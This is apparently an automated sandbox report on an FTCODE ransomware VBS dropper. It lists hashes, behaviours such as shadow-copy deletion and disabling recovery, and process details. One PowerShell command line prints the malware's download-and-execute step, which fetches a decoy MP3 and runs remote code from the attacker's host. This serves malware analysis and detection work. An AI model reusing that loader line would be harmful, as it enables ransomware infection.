General Info

File name

Scan_New_Folder_8569959511050404395043105308886755597758373094.vbs

Full analysis
https://app.any.run/tasks/9aac9974-ac45-4cf2-bef5-2dd100b77c8e
Verdict
Malicious activity
Analysis date
10/9/2019, 16:18:56
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:

trojan

ransomware

ftcode

Indicators:

MIME:
text/plain
File info:
ASCII text, with CRLF, LF line terminators
MD5

be611918fabc12048aeba6e55f6559d7

SHA1

4cb525212460fedae4820a7cfc39e47db48c4c7b

SHA256

07c226d6e4ab84a586b1a09f09896223412de927513fda6bf13b031dc497e686

SSDEEP

48:KudJXRRAiRESdFZyRkRR8IRHRQRJf8i+:tdJBRAyTZCYR8sxEJ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
475 seconds
Additional time used
none
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
on
Network geolocation
IT
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 11.0.9600.18860 KB4052978
  • Adobe Acrobat Reader DC MUI (15.007.20033)
  • Adobe Flash Player 27 ActiveX (27.0.0.187)
  • Adobe Flash Player 27 NPAPI (27.0.0.187)
  • Adobe Flash Player 27 PPAPI (27.0.0.187)
  • CCleaner (5.35)
  • Google Chrome (75.0.3770.100)
  • Google Update Helper (1.3.33.23)
  • Java 8 Update 92 (64-bit) (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.7.2 (4.7.03062)
  • Microsoft Office Access MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Office 32-bit Components 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Professional 2010 (14.0.4763.1000)
  • Microsoft Office Proof (English) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (French) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Shared 32-bit MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Single Image 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Visual C++ 2005 Redistributable (x64) (8.0.61000)
  • Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (11.0.61030.0)
  • Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (11.0.61030)
  • Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (11.0.61030)
  • Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.21.27702 (14.21.27702.2)
  • Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
  • Microsoft Visual C++ 2019 X64 Additional Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
  • Mozilla Firefox 67.0.4 (x64 en-US) (67.0.4)
  • Mozilla Maintenance Service (67.0.4)
  • Notepad++ (64-bit x64) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype™ 7.39 (7.39.102)
  • Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (64-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Hyphenation Parent Package English
  • IE Spelling Parent Package English
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • InternetExplorer Package TopLevel
  • KB2479943
  • KB2491683
  • KB2506014
  • KB2506212
  • KB2506928
  • KB2509553
  • KB2532531
  • KB2533552
  • KB2534111
  • KB2545698
  • KB2547666
  • KB2552343
  • KB2560656
  • KB2563227
  • KB2564958
  • KB2579686
  • KB2585542
  • KB2585542 SP1
  • KB2598845
  • KB2603229
  • KB2604115
  • KB2620704
  • KB2621440
  • KB2631813
  • KB2640148
  • KB2653956
  • KB2654428
  • KB2656356
  • KB2656356 SP1
  • KB2660075
  • KB2667402
  • KB2685811
  • KB2685813
  • KB2685939
  • KB2690533
  • KB2698365
  • KB2705219
  • KB2706045
  • KB2719857
  • KB2726535
  • KB2727528
  • KB2729094
  • KB2729452
  • KB2732059
  • KB2732487
  • KB2736422
  • KB2742599
  • KB2750841
  • KB2758857
  • KB2761217
  • KB2763523
  • KB2770660
  • KB2773072
  • KB2786081
  • KB2789645
  • KB2789645 SP1
  • KB2791765
  • KB2799926
  • KB2800095
  • KB2807986
  • KB2808679
  • KB2813430
  • KB2834140
  • KB2836942
  • KB2836943
  • KB2840631
  • KB2843630
  • KB2847927
  • KB2852386
  • KB2853952
  • KB2861698
  • KB2862152
  • KB2862330
  • KB2862335
  • KB2864202
  • KB2868038
  • KB2871997
  • KB2884256
  • KB2888049
  • KB2891804
  • KB2892074
  • KB2893294
  • KB2893519
  • KB2894844
  • KB2900986
  • KB2908783
  • KB2911501
  • KB2912390
  • KB2918077
  • KB2919469
  • KB2931356
  • KB2937610
  • KB2943357
  • KB2952664
  • KB2966583
  • KB2968294
  • KB2970228
  • KB2972100
  • KB2972211
  • KB2973112
  • KB2973201
  • KB2973351
  • KB2977292
  • KB2978120
  • KB2978742
  • KB2984972
  • KB2985461
  • KB2991963
  • KB2992611
  • KB3003743
  • KB3004361
  • KB3004375
  • KB3006121
  • KB3006137
  • KB3010788
  • KB3011780
  • KB3013531
  • KB3019978
  • KB3020370
  • KB3021674
  • KB3021917
  • KB3022777
  • KB3023215
  • KB3030377
  • KB3031432
  • KB3035126
  • KB3035132
  • KB3037574
  • KB3042058
  • KB3045685
  • KB3046017
  • KB3046269
  • KB3054476
  • KB3055642
  • KB3059317
  • KB3060716
  • KB3067903
  • KB3068708
  • KB3071756
  • KB3072305
  • KB3074543
  • KB3075220
  • KB3076895
  • KB3078601
  • KB3078667
  • KB3080149
  • KB3084135
  • KB3086255
  • KB3092601
  • KB3092627
  • KB3093513
  • KB3097989
  • KB3101722
  • KB3107998
  • KB3108371
  • KB3108381
  • KB3108664
  • KB3109103
  • KB3109560
  • KB3110329
  • KB3115858
  • KB3115858 SP1
  • KB3122648
  • KB3124275
  • KB3126587
  • KB3127220
  • KB3133977
  • KB3137061
  • KB3138378
  • KB3138612
  • KB3138910
  • KB3139398
  • KB3139914
  • KB3140245
  • KB3147071
  • KB3150220
  • KB3155178
  • KB3156016
  • KB3156019
  • KB3159398
  • KB3161102
  • KB3161949
  • KB3161958
  • KB3170735
  • KB3170735 SP1
  • KB3172605
  • KB3177467
  • KB3179573
  • KB3184143
  • KB4019990
  • KB4040980
  • KB976902
  • KB982018
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • Package 1 for KB2656356
  • Package 1 for KB2789645
  • Package 1 for KB3115858
  • Package 1 for KB3170735
  • Package 2 for KB2585542
  • Package 2 for KB2656356
  • Package 2 for KB2789645
  • Package 2 for KB3115858
  • Package 2 for KB3170735
  • Package 3 for KB2585542
  • Package 3 for KB2656356
  • Package 4 for KB2656356
  • Package 4 for KB2789645
  • Package 5 for KB2656356
  • Package 7 for KB2656356
  • PlatformUpdate Win7 SRV08R2 Package TopLevel
  • ProfessionalEdition
  • RollupFix
  • UltimateEdition
  • WUClient SelfUpdate ActiveX
  • WUClient SelfUpdate Aux TopLevel
  • WUClient SelfUpdate Core TopLevel

Behavior activities

MALICIOUS SUSPICIOUS INFO
Renames files like Ransomware
  • powershell.exe (PID: 2064)
Deletes shadow copies
  • cmd.exe (PID: 792)
  • cmd.exe (PID: 2644)
Uses Task Scheduler to run other applications
  • powershell.exe (PID: 2064)
Writes to a start menu file
  • powershell.exe (PID: 2064)
Loads the Task Scheduler COM API
  • schtasks.exe (PID: 876)
FTCODE was detected
  • powershell.exe (PID: 2064)
Starts BCDEDIT.EXE to disable recovery
  • cmd.exe (PID: 1580)
Creates files like Ransomware instruction
  • powershell.exe (PID: 2064)
Reads the machine GUID from the registry
  • WinRAR.exe (PID: 2940)
  • powershell.exe (PID: 2064)
  • vlc.exe (PID: 2096)
  • WScript.exe (PID: 2104)
Starts CMD.EXE for commands execution
  • powershell.exe (PID: 2064)
Executes PowerShell scripts
  • WScript.exe (PID: 2104)
Creates files in the user directory
  • powershell.exe (PID: 2064)
  • vlc.exe (PID: 2096)
Dropped object may contain Bitcoin addresses
  • IEXPLORE.EXE (PID: 2484)
Manual execution by user
  • iexplore.exe (PID: 2172)
  • NOTEPAD.EXE (PID: 2996)
  • WinRAR.exe (PID: 2940)
Dropped object may contain URL to Tor Browser
  • powershell.exe (PID: 2064)
Reads settings of System Certificates
  • iexplore.exe (PID: 2172)
  • IEXPLORE.EXE (PID: 2484)
  • powershell.exe (PID: 2064)
Dropped object may contain TOR URL's
  • powershell.exe (PID: 2064)
Reads internet explorer settings
  • IEXPLORE.EXE (PID: 2484)
Changes internet zones settings
  • iexplore.exe (PID: 2172)
Reads Internet Cache Settings
  • iexplore.exe (PID: 2172)
Creates files in the user directory
  • iexplore.exe (PID: 2172)
  • IEXPLORE.EXE (PID: 2484)
Reads the machine GUID from the registry
  • iexplore.exe (PID: 2172)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

Video and screenshots

Processes

Total processes
70
Monitored processes
20
Malicious processes
4
Suspicious processes
0

Behavior graph

+
start wscript.exe no specs #STOP powershell.exe vlc.exe schtasks.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs bcdedit.exe no specs cmd.exe no specs bcdedit.exe no specs cmd.exe no specs wbadmin.exe no specs cmd.exe no specs wbadmin.exe no specs wbadmin.exe no specs vssadmin.exe no specs winrar.exe no specs iexplore.exe iexplore.exe notepad.exe no specs
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
2104
CMD
"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\Scan_New_Folder_8569959511050404395043105308886755597758373094.vbs"
Path
C:\Windows\System32\WScript.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft ® Windows Based Script Host
Version
5.8.7600.16385
Modules
Image
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sxs.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\msisip.dll
c:\windows\system32\wshext.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\scrobj.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\propsys.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\wininet.dll
c:\windows\system32\userenv.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll

PID
2064
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = $env:temp + '\ramst007.mp3';(New-Object Net.WebClient).DownloadFile('https://archive.org/download/RammsteinRammsteinMix/Cast_1_64kb.mp3',$a); Start-Process $a;iex ((New-Object Net.WebClient).DownloadString('http://ceco.myheritageins.com/?need=streetm&vid=vbs4&4643'));
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
WScript.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v2.0.50727\mscorwks.dll
c:\windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\mscorlib\0478aed7fc25ae268474c704fd2a3e0f\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system\9b0615d346556a8ae639dcec168731cc\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\fabca41dc6cc22a902c2525408b49ab9\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.management.a#\d5ab9ebdfc2bacea66210c16fff703d2\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.core\2706ddbd765b8a111d3083f8af88ef03\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\326a4488a1881b3bd8ea1e8f4dd7420f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.configuratio#\1e9190c7a12053ea715c8d8ef8faddd1\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.wsman.man#\23314086651ff4d13264ef3cd19e0b4e\microsoft.wsman.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.transactions\9354030849f9e58d9b95d32149f7bb68\system.transactions.ni.dll
c:\windows\assembly\gac_64\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\2e6ebcf758bbffd55f7abfd8878c72c1\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\7c10a24ff552941b03414d424169041f\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\89738d6a75ab575f400360d0670f60ed\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework64\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.xml\e0542eb82c5f716397d316d5c88f7ae5\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.management\38c49b707af17308185a48479fcb7404\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.directoryser#\543de12ce97f16746b85981a80878035\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\microsoft.net\framework64\v2.0.50727\mscorjit.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.data\2276c85b65e1f517da1b9026640e2a55\system.data.ni.dll
c:\windows\assembly\gac_64\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.configuration\a2571a4e32a586b52463d88a83702aed\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\credssp.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\security.dll
c:\windows\system32\schannel.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll
c:\program files\videolan\vlc\vlc.exe
c:\windows\system32\schtasks.exe
c:\windows\system32\sxs.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.security\9ce308135fc7c9d6f24c6f8f66fad6f0\system.security.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.web\89d278aee76905ee8d74787e3d970e98\system.web.ni.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\wininet.dll
c:\windows\microsoft.net\framework64\v2.0.50727\wminet_utils.dll
c:\windows\system32\wbem\wmiutils.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll

PID
2096
CMD
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\admin\AppData\Local\Temp\ramst007.mp3"
Path
C:\Program Files\VideoLAN\VLC\vlc.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
VideoLAN
Description
VLC media player
Version
2.2.6
Modules
Image
c:\program files\videolan\vlc\vlc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\videolan\vlc\libvlc.dll
c:\program files\videolan\vlc\libvlccore.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ole32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winmm.dll
c:\program files\videolan\vlc\plugins\access\libdshow_plugin.dll
c:\windows\system32\oleaut32.dll
c:\program files\videolan\vlc\plugins\audio_output\libdirectsound_plugin.dll
c:\program files\videolan\vlc\plugins\audio_output\libwaveout_plugin.dll
c:\program files\videolan\vlc\plugins\video_output\libdirect3d_plugin.dll
c:\program files\videolan\vlc\plugins\video_output\libdirectdraw_plugin.dll
c:\windows\system32\dsound.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\mmdevapi.dll
c:\windows\system32\propsys.dll
c:\program files\videolan\vlc\plugins\control\libwin_msg_plugin.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\uxtheme.dll
c:\program files\videolan\vlc\plugins\control\libhotkeys_plugin.dll
c:\program files\videolan\vlc\plugins\access\libvdr_plugin.dll
c:\program files\videolan\vlc\plugins\control\libwin_hotkeys_plugin.dll
c:\program files\videolan\vlc\plugins\access\libfilesystem_plugin.dll
c:\program files\videolan\vlc\plugins\stream_filter\libsmooth_plugin.dll
c:\program files\videolan\vlc\plugins\gui\libqt4_plugin.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\winspool.drv
c:\windows\system32\wsock32.dll
c:\program files\videolan\vlc\plugins\stream_filter\libhttplive_plugin.dll
c:\program files\videolan\vlc\plugins\stream_filter\libdash_plugin.dll
c:\program files\videolan\vlc\plugins\access\libzip_plugin.dll
c:\program files\videolan\vlc\plugins\access\librar_plugin.dll
c:\program files\videolan\vlc\plugins\stream_filter\librecord_plugin.dll
c:\program files\videolan\vlc\plugins\demux\libes_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libtheora_plugin.dll
c:\program files\videolan\vlc\plugins\codec\librawvideo_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libspeex_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libvorbis_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libaes3_plugin.dll
c:\program files\videolan\vlc\plugins\codec\liblpcm_plugin.dll
c:\program files\videolan\vlc\plugins\packetizer\libpacketizer_h264_plugin.dll
c:\program files\videolan\vlc\plugins\packetizer\libpacketizer_flac_plugin.dll
c:\program files\videolan\vlc\plugins\packetizer\libpacketizer_dirac_plugin.dll
c:\program files\videolan\vlc\plugins\packetizer\libpacketizer_mlp_plugin.dll
c:\program files\videolan\vlc\plugins\packetizer\libpacketizer_mpeg4audio_plugin.dll
c:\program files\videolan\vlc\plugins\packetizer\libpacketizer_vc1_plugin.dll
c:\windows\system32\userenv.dll
c:\program files\videolan\vlc\plugins\codec\libsvcdsub_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libspudec_plugin.dll
c:\program files\videolan\vlc\plugins\packetizer\libpacketizer_mpeg4video_plugin.dll
c:\program files\videolan\vlc\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libcvdsub_plugin.dll
c:\program files\videolan\vlc\plugins\packetizer\libpacketizer_hevc_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libavcodec_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libmpeg_audio_plugin.dll
c:\program files\videolan\vlc\plugins\meta_engine\libtaglib_plugin.dll
c:\program files\videolan\vlc\plugins\lua\liblua_plugin.dll
c:\program files\videolan\vlc\plugins\meta_engine\libfolder_plugin.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\videolan\vlc\plugins\access\liblibbluray_plugin.dll
c:\program files\videolan\vlc\plugins\access\libaccess_bd_plugin.dll
c:\program files\videolan\vlc\plugins\access\libdvdnav_plugin.dll
c:\program files\videolan\vlc\plugins\demux\libmp4_plugin.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\program files\videolan\vlc\plugins\demux\libavi_plugin.dll
c:\program files\videolan\vlc\plugins\demux\libasf_plugin.dll
c:\program files\videolan\vlc\plugins\demux\libflacsys_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libjpeg_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libcdg_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libpng_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libschroedinger_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libdts_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libaraw_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libsubstx3g_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libflac_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libg711_plugin.dll
c:\program files\videolan\vlc\plugins\codec\liblibass_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libfaad_plugin.dll
c:\program files\videolan\vlc\plugins\codec\liba52_plugin.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\audioses.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\program files\videolan\vlc\plugins\audio_mixer\libfloat_mixer_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libscaletempo_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libmpgatofixed32_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libdtstofloat32_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\liba52tofloat32_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libsamplerate_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libsimple_channel_mixer_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\liba52tospdif_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libdtstospdif_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libdolby_surround_decoder_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libugly_resampler_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libtrivial_channel_mixer_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libaudio_format_plugin.dll
c:\windows\system32\avrt.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll

PID
876
CMD
